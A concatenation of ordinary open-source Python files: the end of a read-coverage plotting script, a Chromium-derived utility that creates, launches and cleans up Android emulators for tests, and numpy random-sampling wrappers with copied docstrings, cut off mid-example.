## These files are usually huge. For scalability, operations performed within this
# loop should be limited.
for line in open(args.input_file):
cols = line.split("\t")
if current_molecule_id is None:
current_molecule_id = cols[0]
current_molecule_coverages = [0] * len(molecules[cols[0]]['s'])
if cols[0] != current_molecule_id:
mol_length_bin = int(len(molecules[current_molecule_id]['s']) / args.mol_bin_size)
median_size = np.median(current_molecule_coverages)
data_bins[mol_length_bin][median_size] += 1
print("DEBUG: molecule {0} appeared to be {1} bp in length with median coverage of {2}".format(current_molecule_id, len(molecules[current_molecule_id]['s']), median_size))
# reset
current_molecule_id = cols[0]
current_molecule_coverages = [0] * len(molecules[cols[0]]['s'])
try:
current_molecule_coverages[int(cols[1]) - 1] = int(cols[3])
except IndexError:
print("ERROR: pileup file reports position {0} coverage but transcript {1} is only {2} bp in length".format(cols[1], current_molecule_id, len(molecules[cols[0]]['s'])) )
# don't forget the last one
mol_length_bin = int(len(molecules[cols[0]]['s']) / args.mol_bin_size)
median_size = np.median(current_molecule_coverages)
data_bins[mol_length_bin][median_size] += 1
## now generate the plot data - x,y positions and radii
x = list()
y = list()
r = list()
for bin_size in data_bins:
for cov in data_bins[bin_size]:
x.append(bin_size)
y.append(cov)
r.append(data_bins[bin_size][cov])
plt.xlabel('Molecule length')
plt.ylabel('Median depth of coverage')
#plt.xlim(0,2000)
#plt.ylim(0,500)
plt.scatter(x, y, s=r, alpha=0.5)
if args.output_file == 'plot':
plt.show()
else:
plt.savefig(args.output_file)
if __name__ == '__main__':
main()
|
jorvis/biocode
|
sandbox/jorvis/generate_read_coverage_figure.py
|
Python
|
mit
| 4,414
|
[
"Bowtie"
] |
95e424674eab37f5ca1dd49e526c7816cd890ebbf338725436376c53ffa7e39f
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides an interface to start and stop Android emulator.
Emulator: The class provides the methods to launch/shutdown the emulator with
the android virtual device named 'avd_armeabi' .
"""
import logging
import os
import signal
import subprocess
import time
# TODO(craigdh): Move these pylib dependencies to pylib/utils/.
from xysec_adb.pylib import android_commands
from xysec_adb.pylib import cmd_helper
from xysec_adb.pylib import constants
from xysec_adb.pylib import pexpect
from xysec_adb.pylib.device import device_utils
from xysec_adb.pylib.utils import time_profile
import errors
import run_command
# SD card size
SDCARD_SIZE = '512M'
# Template used to generate config.ini files for the emulator
CONFIG_TEMPLATE = """avd.ini.encoding=ISO-8859-1
hw.dPad=no
hw.lcd.density=320
sdcard.size=512M
hw.cpu.arch={hw.cpu.arch}
hw.device.hash=-708107041
hw.camera.back=none
disk.dataPartition.size=800M
hw.gpu.enabled=yes
skin.path=720x1280
skin.dynamic=yes
hw.keyboard=yes
hw.ramSize=1024
hw.device.manufacturer=Google
hw.sdCard=yes
hw.mainKeys=no
hw.accelerometer=yes
skin.name=720x1280
abi.type={abi.type}
hw.trackBall=no
hw.device.name=Galaxy Nexus
hw.battery=yes
hw.sensors.proximity=yes
image.sysdir.1=system-images/android-{api.level}/{abi.type}/
hw.sensors.orientation=yes
hw.audioInput=yes
hw.camera.front=none
hw.gps=yes
vm.heapSize=128
{extras}"""
CONFIG_REPLACEMENTS = {
'x86': {
'{hw.cpu.arch}': 'x86',
'{abi.type}': 'x86',
'{extras}': ''
},
'arm': {
'{hw.cpu.arch}': 'arm',
'{abi.type}': 'armeabi-v7a',
'{extras}': 'hw.cpu.model=cortex-a8\n'
},
'mips': {
'{hw.cpu.arch}': 'mips',
'{abi.type}': 'mips',
'{extras}': ''
}
}
class EmulatorLaunchException(Exception):
"""Emulator failed to launch."""
pass
def _KillAllEmulators():
"""Kill all running emulators that look like ones we started.
There are odd 'sticky' cases where there can be no emulator process
running but a device slot is taken. A little bot trouble and and
we're out of room forever.
"""
emulators = android_commands.GetAttachedDevices(hardware=False)
if not emulators:
return
for emu_name in emulators:
cmd_helper.RunCmd(['adb', '-s', emu_name, 'emu', 'kill'])
logging.info('Emulator killing is async; give a few seconds for all to die.')
for _ in range(5):
if not android_commands.GetAttachedDevices(hardware=False):
return
time.sleep(1)
def DeleteAllTempAVDs():
"""Delete all temporary AVDs which are created for tests.
If the test exits abnormally and some temporary AVDs created when testing may
be left in the system. Clean these AVDs.
"""
avds = device_utils.GetAVDs()
if not avds:
return
for avd_name in avds:
if 'run_tests_avd' in avd_name:
cmd = ['android', '-s', 'delete', 'avd', '--name', avd_name]
cmd_helper.RunCmd(cmd)
logging.info('Delete AVD %s' % avd_name)
class PortPool(object):
"""Pool for emulator port starting position that changes over time."""
_port_min = 5554
_port_max = 5585
_port_current_index = 0
@classmethod
def port_range(cls):
"""Return a range of valid ports for emulator use.
The port must be an even number between 5554 and 5584. Sometimes
a killed emulator "hangs on" to a port long enough to prevent
relaunch. This is especially true on slow machines (like a bot).
Cycling through a port start position helps make us resilient."""
ports = range(cls._port_min, cls._port_max, 2)
n = cls._port_current_index
cls._port_current_index = (n + 1) % len(ports)
return ports[n:] + ports[:n]
def _GetAvailablePort():
"""Returns an available TCP port for the console."""
used_ports = []
emulators = android_commands.GetAttachedDevices(hardware=False)
for emulator in emulators:
used_ports.append(emulator.split('-')[1])
for port in PortPool.port_range():
if str(port) not in used_ports:
return port
def LaunchTempEmulators(emulator_count, abi, api_level, wait_for_boot=True):
"""Create and launch temporary emulators and wait for them to boot.
Args:
emulator_count: number of emulators to launch.
abi: the emulator target platform
api_level: the api level (e.g., 19 for Android v4.4 - KitKat release)
wait_for_boot: whether or not to wait for emulators to boot up
Returns:
List of emulators.
"""
emulators = []
for n in xrange(emulator_count):
t = time_profile.TimeProfile('Emulator launch %d' % n)
# Creates a temporary AVD.
avd_name = 'run_tests_avd_%d' % n
logging.info('Emulator launch %d with avd_name=%s and api=%d',
n, avd_name, api_level)
emulator = Emulator(avd_name, abi)
emulator.CreateAVD(api_level)
emulator.Launch(kill_all_emulators=n == 0)
t.Stop()
emulators.append(emulator)
# Wait for all emulators to boot completed.
if wait_for_boot:
for emulator in emulators:
emulator.ConfirmLaunch(True)
return emulators
def LaunchEmulator(avd_name, abi):
"""Launch an existing emulator with name avd_name.
Args:
avd_name: name of existing emulator
abi: the emulator target platform
Returns:
emulator object.
"""
logging.info('Specified emulator named avd_name=%s launched', avd_name)
emulator = Emulator(avd_name, abi)
emulator.Launch(kill_all_emulators=True)
emulator.ConfirmLaunch(True)
return emulator
class Emulator(object):
"""Provides the methods to launch/shutdown the emulator.
The emulator has the android virtual device named 'avd_armeabi'.
The emulator could use any even TCP port between 5554 and 5584 for the
console communication, and this port will be part of the device name like
'emulator-5554'. Assume it is always True, as the device name is the id of
emulator managed in this class.
Attributes:
emulator: Path of Android's emulator tool.
popen: Popen object of the running emulator process.
device: Device name of this emulator.
"""
# Signals we listen for to kill the emulator on
_SIGNALS = (signal.SIGINT, signal.SIGHUP)
# Time to wait for an emulator launch, in seconds. This includes
# the time to launch the emulator and a wait-for-device command.
_LAUNCH_TIMEOUT = 120
# Timeout interval of wait-for-device command before bouncing to a a
# process life check.
_WAITFORDEVICE_TIMEOUT = 5
# Time to wait for a "wait for boot complete" (property set on device).
_WAITFORBOOT_TIMEOUT = 300
def __init__(self, avd_name, abi):
"""Init an Emulator.
Args:
avd_name: name of the AVD to create
abi: target platform for emulator being created, defaults to x86
"""
android_sdk_root = os.path.join(constants.EMULATOR_SDK_ROOT, 'sdk')
self.emulator = os.path.join(android_sdk_root, 'tools', 'emulator')
self.android = os.path.join(android_sdk_root, 'tools', 'android')
self.popen = None
self.device_serial = None
self.abi = abi
self.avd_name = avd_name
@staticmethod
def _DeviceName():
"""Return our device name."""
port = _GetAvailablePort()
return ('emulator-%d' % port, port)
def CreateAVD(self, api_level):
"""Creates an AVD with the given name.
Args:
api_level: the api level of the image
Return avd_name.
"""
if self.abi == 'arm':
abi_option = 'armeabi-v7a'
elif self.abi == 'mips':
abi_option = 'mips'
else:
abi_option = 'x86'
api_target = 'android-%s' % api_level
avd_command = [
self.android,
'--silent',
'create', 'avd',
'--name', self.avd_name,
'--abi', abi_option,
'--target', api_target,
'--sdcard', SDCARD_SIZE,
'--force',
]
avd_cmd_str = ' '.join(avd_command)
logging.info('Create AVD command: %s', avd_cmd_str)
avd_process = pexpect.spawn(avd_cmd_str)
# Instead of creating a custom profile, we overwrite config files.
avd_process.expect('Do you wish to create a custom hardware profile')
avd_process.sendline('no\n')
avd_process.expect('Created AVD \'%s\'' % self.avd_name)
# Replace current configuration with default Galaxy Nexus config.
avds_dir = os.path.join(os.path.expanduser('~'), '.android', 'avd')
ini_file = os.path.join(avds_dir, '%s.ini' % self.avd_name)
new_config_ini = os.path.join(avds_dir, '%s.avd' % self.avd_name,
'config.ini')
# Remove config files with defaults to replace with Google's GN settings.
os.unlink(ini_file)
os.unlink(new_config_ini)
# Create new configuration files with Galaxy Nexus by Google settings.
with open(ini_file, 'w') as new_ini:
new_ini.write('avd.ini.encoding=ISO-8859-1\n')
new_ini.write('target=%s\n' % api_target)
new_ini.write('path=%s/%s.avd\n' % (avds_dir, self.avd_name))
new_ini.write('path.rel=avd/%s.avd\n' % self.avd_name)
custom_config = CONFIG_TEMPLATE
replacements = CONFIG_REPLACEMENTS[self.abi]
for key in replacements:
custom_config = custom_config.replace(key, replacements[key])
custom_config = custom_config.replace('{api.level}', str(api_level))
with open(new_config_ini, 'w') as new_config_ini:
new_config_ini.write(custom_config)
return self.avd_name
def _DeleteAVD(self):
"""Delete the AVD of this emulator."""
avd_command = [
self.android,
'--silent',
'delete',
'avd',
'--name', self.avd_name,
]
logging.info('Delete AVD command: %s', ' '.join(avd_command))
cmd_helper.RunCmd(avd_command)
def Launch(self, kill_all_emulators):
"""Launches the emulator asynchronously. Call ConfirmLaunch() to ensure the
emulator is ready for use.
If fails, an exception will be raised.
"""
if kill_all_emulators:
_KillAllEmulators() # just to be sure
self._AggressiveImageCleanup()
(self.device_serial, port) = self._DeviceName()
emulator_command = [
self.emulator,
# Speed up emulator launch by 40%. Really.
'-no-boot-anim',
# The default /data size is 64M.
# That's not enough for 8 unit test bundles and their data.
'-partition-size', '512',
# Use a familiar name and port.
'-avd', self.avd_name,
'-port', str(port),
# Wipe the data. We've seen cases where an emulator gets 'stuck' if we
# don't do this (every thousand runs or so).
'-wipe-data',
# Enable GPU by default.
'-gpu', 'on',
'-qemu', '-m', '1024',
]
if self.abi == 'x86':
emulator_command.extend([
# For x86 emulator --enable-kvm will fail early, avoiding accidental
# runs in a slow mode (i.e. without hardware virtualization support).
'--enable-kvm',
])
logging.info('Emulator launch command: %s', ' '.join(emulator_command))
self.popen = subprocess.Popen(args=emulator_command,
stderr=subprocess.STDOUT)
self._InstallKillHandler()
@staticmethod
def _AggressiveImageCleanup():
"""Aggressive cleanup of emulator images.
Experimentally it looks like our current emulator use on the bot
leaves image files around in /tmp/android-$USER. If a "random"
name gets reused, we choke with a 'File exists' error.
TODO(jrg): is there a less hacky way to accomplish the same goal?
"""
logging.info('Aggressive Image Cleanup')
emulator_imagedir = '/tmp/android-%s' % os.environ['USER']
if not os.path.exists(emulator_imagedir):
return
for image in os.listdir(emulator_imagedir):
full_name = os.path.join(emulator_imagedir, image)
if 'emulator' in full_name:
logging.info('Deleting emulator image %s', full_name)
os.unlink(full_name)
def ConfirmLaunch(self, wait_for_boot=False):
"""Confirm the emulator launched properly.
Loop on a wait-for-device with a very small timeout. On each
timeout, check the emulator process is still alive.
After confirming a wait-for-device can be successful, make sure
it returns the right answer.
"""
seconds_waited = 0
number_of_waits = 2 # Make sure we can wfd twice
# TODO(jbudorick) Un-handroll this in the implementation switch.
adb_cmd = "adb -s %s %s" % (self.device_serial, 'wait-for-device')
while seconds_waited < self._LAUNCH_TIMEOUT:
try:
run_command.RunCommand(adb_cmd,
timeout_time=self._WAITFORDEVICE_TIMEOUT,
retry_count=1)
number_of_waits -= 1
if not number_of_waits:
break
except errors.WaitForResponseTimedOutError:
seconds_waited += self._WAITFORDEVICE_TIMEOUT
adb_cmd = "adb -s %s %s" % (self.device_serial, 'kill-server')
run_command.RunCommand(adb_cmd)
self.popen.poll()
if self.popen.returncode != None:
raise EmulatorLaunchException('EMULATOR DIED')
if seconds_waited >= self._LAUNCH_TIMEOUT:
raise EmulatorLaunchException('TIMEOUT with wait-for-device')
logging.info('Seconds waited on wait-for-device: %d', seconds_waited)
if wait_for_boot:
# Now that we checked for obvious problems, wait for a boot complete.
# Waiting for the package manager is sometimes problematic.
# TODO(jbudorick) Convert this once waiting for the package manager and
# the external storage is no longer problematic.
d = device_utils.DeviceUtils(self.device_serial)
d.old_interface.WaitForSystemBootCompleted(self._WAITFORBOOT_TIMEOUT)
def Shutdown(self):
"""Shuts down the process started by launch."""
self._DeleteAVD()
if self.popen:
self.popen.poll()
if self.popen.returncode == None:
self.popen.kill()
self.popen = None
def _ShutdownOnSignal(self, _signum, _frame):
logging.critical('emulator _ShutdownOnSignal')
for sig in self._SIGNALS:
signal.signal(sig, signal.SIG_DFL)
self.Shutdown()
raise KeyboardInterrupt # print a stack
def _InstallKillHandler(self):
"""Install a handler to kill the emulator when we exit unexpectedly."""
for sig in self._SIGNALS:
signal.signal(sig, self._ShutdownOnSignal)
|
appknox/xysec_adb
|
xysec_adb/pylib/utils/emulator.py
|
Python
|
apache-2.0
| 14,436
|
[
"Galaxy"
] |
fa68ed57b49f44ec70012b818c0dd1eb4a5f390e6b651259ddba0a293d8c5eec
|
# MIT License
#
# Copyright (c) 2016 Daily Actie
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Author: Quan Pan <quanpan302@hotmail.com>
# License: MIT License
# Create: 2016-12-02
import numpy.random as rand
def samRandom(n=2):
"""samRandom
:param n: default 2
:return:
.. note:: Not sphinx doc!! 20170214
Encoding: utf-8
module numpy.random.mtrand
from /System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/numpy/random/mtrand.so
by generator 1.138
no doc
Links:
https://docs.scipy.org/doc/numpy/reference/routines.random.html
"""
return rand.rand(n)
def samBeta(a=0.1, b=0.1, size=None): # real signature unknown; restored from __doc__
"""beta(a, b, size=None)
Draw samples from a Beta distribution.
The Beta distribution is a special case of the Dirichlet distribution,
and is related to the Gamma distribution. It has the probability
distribution function
.. math:: f(x; a,b) = \frac{1}{B(\alpha, \beta)} x^{\alpha - 1}
(1 - x)^{\beta - 1},
where the normalisation, B, is the beta function,
.. math:: B(\alpha, \beta) = \int_0^1 t^{\alpha - 1}
(1 - t)^{\beta - 1} dt.
It is often seen in Bayesian inference and order statistics.
:param a: Alpha, non-negative
:type a: float
:param b: Beta, non-negative
:type b: float
:param size: Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
:type size: int or tuple of ints, optional
:returns: out, ndarray
Array of the given shape, containing values drawn from a
Beta distribution.
"""
return rand.beta(a=a, b=b, size=size)
def samBinomial(n=0.1, p=0.5, size=None): # real signature unknown; restored from __doc__
"""binomial(n, p, size=None)
Draw samples from a binomial distribution.
Samples are drawn from a binomial distribution with specified
parameters, n trials and p probability of success where
n an integer >= 0 and p is in the interval [0,1]. (n may be
input as a float, but it is truncated to an integer in use)
Parameters
----------
n : float (but truncated to an integer)
parameter, >= 0.
p : float
parameter, >= 0 and <=1.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
where the values are all integers in [0, n].
See Also
--------
scipy.stats.distributions.binom : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the binomial distribution is
.. math:: P(N) = \binom{n}{N}p^N(1-p)^{n-N},
where :math:`n` is the number of trials, :math:`p` is the probability
of success, and :math:`N` is the number of successes.
When estimating the standard error of a proportion in a population by
using a random sample, the normal distribution works well unless the
product p*n <=5, where p = population proportion estimate, and n =
number of samples, in which case the binomial distribution is used
instead. For example, a sample of 15 people shows 4 who are left
handed, and 11 who are right handed. Then p = 4/15 = 27%. 0.27*15 = 4,
so the binomial distribution should be used in this case.
References
----------
.. [1] Dalgaard, Peter, "Introductory Statistics with R",
Springer-Verlag, 2002.
.. [2] Glantz, Stanton A. "Primer of Biostatistics.", McGraw-Hill,
Fifth Edition, 2002.
.. [3] Lentner, Marvin, "Elementary Applied Statistics", Bogden
and Quigley, 1972.
.. [4] Weisstein, Eric W. "Binomial Distribution." From MathWorld--A
Wolfram Web Resource.
http://mathworld.wolfram.com/BinomialDistribution.html
.. [5] Wikipedia, "Binomial-distribution",
http://en.wikipedia.org/wiki/Binomial_distribution
Examples
--------
Draw samples from the distribution:
>>> n, p = 10, .5 # number of trials, probability of each trial
>>> s = np.random.binomial(n, p, 1000)
# result of flipping a coin 10 times, tested 1000 times.
A real world example. A company drills 9 wild-cat oil exploration
wells, each with an estimated probability of success of 0.1. All nine
wells fail. What is the probability of that happening?
Let's do 20,000 trials of the model, and count the number that
generate zero positive results.
>>> sum(np.random.binomial(9, 0.1, 20000) == 0)/20000.
# answer = 0.38885, or 38%.
"""
return rand.binomial(n=n, p=p, size=size)
def samChiSquare(df=2, size=None): # real signature unknown; restored from __doc__
"""chisquare(df, size=None)
Draw samples from a chi-square distribution.
When `df` independent random variables, each with standard normal
distributions (mean 0, variance 1), are squared and summed, the
resulting distribution is chi-square (see Notes). This distribution
is often used in hypothesis testing.
Parameters
----------
df : int
Number of degrees of freedom.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
output : ndarray
Samples drawn from the distribution, packed in a `size`-shaped
array.
Raises
------
ValueError
When `df` <= 0 or when an inappropriate `size` (e.g. ``size=-1``)
is given.
Notes
-----
The variable obtained by summing the squares of `df` independent,
standard normally distributed random variables:
.. math:: Q = \sum_{i=0}^{\mathtt{df}} X^2_i
is chi-square distributed, denoted
.. math:: Q \sim \chi^2_k.
The probability density function of the chi-squared distribution is
.. math:: p(x) = \frac{(1/2)^{k/2}}{\Gamma(k/2)}
x^{k/2 - 1} e^{-x/2},
where :math:`\Gamma` is the gamma function,
.. math:: \Gamma(x) = \int_0^{-\infty} t^{x - 1} e^{-t} dt.
References
----------
.. [1] NIST "Engineering Statistics Handbook"
http://www.itl.nist.gov/div898/handbook/eda/section3/eda3666.htm
Examples
--------
>>> np.random.chisquare(2,4)
array([ 1.89920014, 9.00867716, 3.13710533, 5.62318272])
"""
return rand.chisquare(df=df, size=size)
def samExponential(scale=1.0, size=None): # real signature unknown; restored from __doc__
"""exponential(scale=1.0, size=None)
Draw samples from an exponential distribution.
Its probability density function is
.. math:: f(x; \frac{1}{\beta}) = \frac{1}{\beta} \exp(-\frac{x}{\beta}),
for ``x > 0`` and 0 elsewhere. :math:`\beta` is the scale parameter,
which is the inverse of the rate parameter :math:`\lambda = 1/\beta`.
The rate parameter is an alternative, widely used parameterization
of the exponential distribution [3]_.
The exponential distribution is a continuous analogue of the
geometric distribution. It describes many common situations, such as
the size of raindrops measured over many rainstorms [1]_, or the time
between page requests to Wikipedia [2]_.
Parameters
----------
scale : float
The scale parameter, :math:`\beta = 1/\lambda`.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
References
----------
.. [1] Peyton Z. Peebles Jr., "Probability, Random Variables and
Random Signal Principles", 4th ed, 2001, p. 57.
.. [2] "Poisson Process", Wikipedia,
http://en.wikipedia.org/wiki/Poisson_process
.. [3] "Exponential Distribution, Wikipedia,
http://en.wikipedia.org/wiki/Exponential_distribution
"""
return rand.exponential(scale=scale, size=size)
def samF(dfnum=1, dfden=48, size=None): # real signature unknown; restored from __doc__
"""f(dfnum, dfden, size=None)
Draw samples from an F distribution.
Samples are drawn from an F distribution with specified parameters,
`dfnum` (degrees of freedom in numerator) and `dfden` (degrees of
freedom in denominator), where both parameters should be greater than
zero.
The random variate of the F distribution (also known as the
Fisher distribution) is a continuous probability distribution
that arises in ANOVA tests, and is the ratio of two chi-square
variates.
Parameters
----------
dfnum : float
Degrees of freedom in numerator. Should be greater than zero.
dfden : float
Degrees of freedom in denominator. Should be greater than zero.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
Samples from the Fisher distribution.
See Also
--------
scipy.stats.distributions.f : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The F statistic is used to compare in-group variances to between-group
variances. Calculating the distribution depends on the sampling, and
so it is a function of the respective degrees of freedom in the
problem. The variable `dfnum` is the number of samples minus one, the
between-groups degrees of freedom, while `dfden` is the within-groups
degrees of freedom, the sum of the number of samples in each group
minus the number of groups.
References
----------
.. [1] Glantz, Stanton A. "Primer of Biostatistics.", McGraw-Hill,
Fifth Edition, 2002.
.. [2] Wikipedia, "F-distribution",
http://en.wikipedia.org/wiki/F-distribution
Examples
--------
An example from Glantz[1], pp 47-40:
Two groups, children of diabetics (25 people) and children from people
without diabetes (25 controls). Fasting blood glucose was measured,
case group had a mean value of 86.1, controls had a mean value of
82.2. Standard deviations were 2.09 and 2.49 respectively. Are these
data consistent with the null hypothesis that the parents diabetic
status does not affect their children's blood glucose levels?
Calculating the F statistic from the data gives a value of 36.01.
Draw samples from the distribution:
>>> dfnum = 1. # between group degrees of freedom
>>> dfden = 48. # within groups degrees of freedom
>>> s = np.random.f(dfnum, dfden, 1000)
The lower bound for the top 1% of the samples is :
>>> sort(s)[-10]
7.61988120985
So there is about a 1% chance that the F statistic will exceed 7.62,
the measured value is 36, so the null hypothesis is rejected at the 1%
level.
"""
return rand.f(dfnum=dfnum, dfden=dfden, size=size)
def samGamma(shape=2.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""gamma(shape, scale=1.0, size=None)
Draw samples from a Gamma distribution.
Samples are drawn from a Gamma distribution with specified parameters,
`shape` (sometimes designated "k") and `scale` (sometimes designated
"theta"), where both parameters are > 0.
Parameters
----------
shape : scalar > 0
The shape of the gamma distribution.
scale : scalar > 0, optional
The scale of the gamma distribution. Default is equal to 1.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
out : ndarray, float
Returns one sample unless `size` parameter is specified.
See Also
--------
scipy.stats.distributions.gamma : probability density function,
distribution or cumulative density function, etc.
Notes
-----
The probability density for the Gamma distribution is
.. math:: p(x) = x^{k-1}\frac{e^{-x/\theta}}{\theta^k\Gamma(k)},
where :math:`k` is the shape and :math:`\theta` the scale,
and :math:`\Gamma` is the Gamma function.
The Gamma distribution is often used to model the times to failure of
electronic components, and arises naturally in processes for which the
waiting times between Poisson distributed events are relevant.
References
----------
.. [1] Weisstein, Eric W. "Gamma Distribution." From MathWorld--A
Wolfram Web Resource.
http://mathworld.wolfram.com/GammaDistribution.html
.. [2] Wikipedia, "Gamma-distribution",
http://en.wikipedia.org/wiki/Gamma-distribution
Examples
--------
Draw samples from the distribution:
>>> shape, scale = 2., 2. # mean and dispersion
>>> s = np.random.gamma(shape, scale, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> import scipy.special as sps
>>> count, bins, ignored = plt.hist(s, 50, normed=True)
>>> y = bins**(shape-1)*(np.exp(-bins/scale) /
... (sps.gamma(shape)*scale**shape))
>>> plt.plot(bins, y, linewidth=2, color='r')
>>> plt.show()
"""
return rand.gamma(shape=shape, scale=scale, size=size)
def samGumbel(loc=0.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""gumbel(loc=0.0, scale=1.0, size=None)
Draw samples from a Gumbel distribution.
Draw samples from a Gumbel distribution with specified location and
scale. For more information on the Gumbel distribution, see
Notes and References below.
Parameters
----------
loc : float
The location of the mode of the distribution.
scale : float
The scale parameter of the distribution.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or scalar
See Also
--------
scipy.stats.gumbel_l
scipy.stats.gumbel_r
scipy.stats.genextreme
weibull
Notes
-----
The Gumbel (or Smallest Extreme Value (SEV) or the Smallest Extreme
Value Type I) distribution is one of a class of Generalized Extreme
Value (GEV) distributions used in modeling extreme value problems.
The Gumbel is a special case of the Extreme Value Type I distribution
for maximums from distributions with "exponential-like" tails.
The probability density for the Gumbel distribution is
.. math:: p(x) = \frac{e^{-(x - \mu)/ \beta}}{\beta} e^{ -e^{-(x - \mu)/
\beta}},
where :math:`\mu` is the mode, a location parameter, and
:math:`\beta` is the scale parameter.
The Gumbel (named for German mathematician Emil Julius Gumbel) was used
very early in the hydrology literature, for modeling the occurrence of
flood events. It is also used for modeling maximum wind speed and
rainfall rates. It is a "fat-tailed" distribution - the probability of
an event in the tail of the distribution is larger than if one used a
Gaussian, hence the surprisingly frequent occurrence of 100-year
floods. Floods were initially modeled as a Gaussian process, which
underestimated the frequency of extreme events.
It is one of a class of extreme value distributions, the Generalized
Extreme Value (GEV) distributions, which also includes the Weibull and
Frechet.
The function has a mean of :math:`\mu + 0.57721\beta` and a variance
of :math:`\frac{\pi^2}{6}\beta^2`.
References
----------
.. [1] Gumbel, E. J., "Statistics of Extremes,"
New York: Columbia University Press, 1958.
.. [2] Reiss, R.-D. and Thomas, M., "Statistical Analysis of Extreme
Values from Insurance, Finance, Hydrology and Other Fields,"
Basel: Birkhauser Verlag, 2001.
Examples
--------
Draw samples from the distribution:
>>> mu, beta = 0, 0.1 # location and scale
>>> s = np.random.gumbel(mu, beta, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 30, normed=True)
>>> plt.plot(bins, (1/beta)*np.exp(-(bins - mu)/beta)
... * np.exp( -np.exp( -(bins - mu) /beta) ),
... linewidth=2, color='r')
>>> plt.show()
Show how an extreme value distribution can arise from a Gaussian process
and compare to a Gaussian:
>>> means = []
>>> maxima = []
>>> for i in range(0,1000) :
... a = np.random.normal(mu, beta, 1000)
... means.append(a.mean())
... maxima.append(a.max())
>>> count, bins, ignored = plt.hist(maxima, 30, normed=True)
>>> beta = np.std(maxima)*np.pi/np.sqrt(6)
>>> mu = np.mean(maxima) - 0.57721*beta
>>> plt.plot(bins, (1/beta)*np.exp(-(bins - mu)/beta)
... * np.exp(-np.exp(-(bins - mu)/beta)),
... linewidth=2, color='r')
>>> plt.plot(bins, 1/(beta * np.sqrt(2 * np.pi))
... * np.exp(-(bins - mu)**2 / (2 * beta**2)),
... linewidth=2, color='g')
>>> plt.show()
"""
return rand.gumbel(loc=loc, scale=scale, size=size)
def samLaplace(loc=0.0, scale=1.0, size=None): # real signature unknown; restored from __doc__
"""laplace(loc=0.0, scale=1.0, size=None)
Draw samples from the Laplace or double exponential distribution with
specified location (or mean) and scale (decay).
The Laplace distribution is similar to the Gaussian/normal distribution,
but is sharper at the peak and has fatter tails. It represents the
difference between two independent, identically distributed exponential
random variables.
Parameters
----------
loc : float, optional
The position, :math:`\mu`, of the distribution peak.
scale : float, optional
:math:`\lambda`, the exponential decay.
size : int or tuple of ints, optional
Output shape. If the given shape is, e.g., ``(m, n, k)``, then
``m * n * k`` samples are drawn. Default is None, in which case a
single value is returned.
Returns
-------
samples : ndarray or float
Notes
-----
It has the probability density function
.. math:: f(x; \mu, \lambda) = \frac{1}{2\lambda}
\exp\left(-\frac{|x - \mu|}{\lambda}\right).
The first law of Laplace, from 1774, states that the frequency
of an error can be expressed as an exponential function of the
absolute magnitude of the error, which leads to the Laplace
distribution. For many problems in economics and health
sciences, this distribution seems to model the data better
than the standard Gaussian distribution.
References
----------
.. [1] Abramowitz, M. and Stegun, I. A. (Eds.). "Handbook of
Mathematical Functions with Formulas, Graphs, and Mathematical
Tables, 9th printing," New York: Dover, 1972.
.. [2] Kotz, Samuel, et. al. "The Laplace Distribution and
Generalizations, " Birkhauser, 2001.
.. [3] Weisstein, Eric W. "Laplace Distribution."
From MathWorld--A Wolfram Web Resource.
http://mathworld.wolfram.com/LaplaceDistribution.html
.. [4] Wikipedia, "Laplace Distribution",
http://en.wikipedia.org/wiki/Laplace_distribution
Examples
--------
Draw samples from the distribution
>>> loc, scale = 0., 1.
>>> s = np.random.laplace(loc, scale, 1000)
Display the histogram of the samples, along with
the probability density function:
>>> import matplotlib.pyplot as plt
>>> count, bins, ignored = plt.hist(s, 30, normed=True)
>>> x = np.arange(-8., 8., .01)
>>> pdf = np.exp(-abs(x-loc)/scale)/(2.*scale)
>>> plt.plot(x, pdf)
Plot Gaussian for comparison:
>>> g = (1/(scale * np.sqrt(2 * np.pi)) *
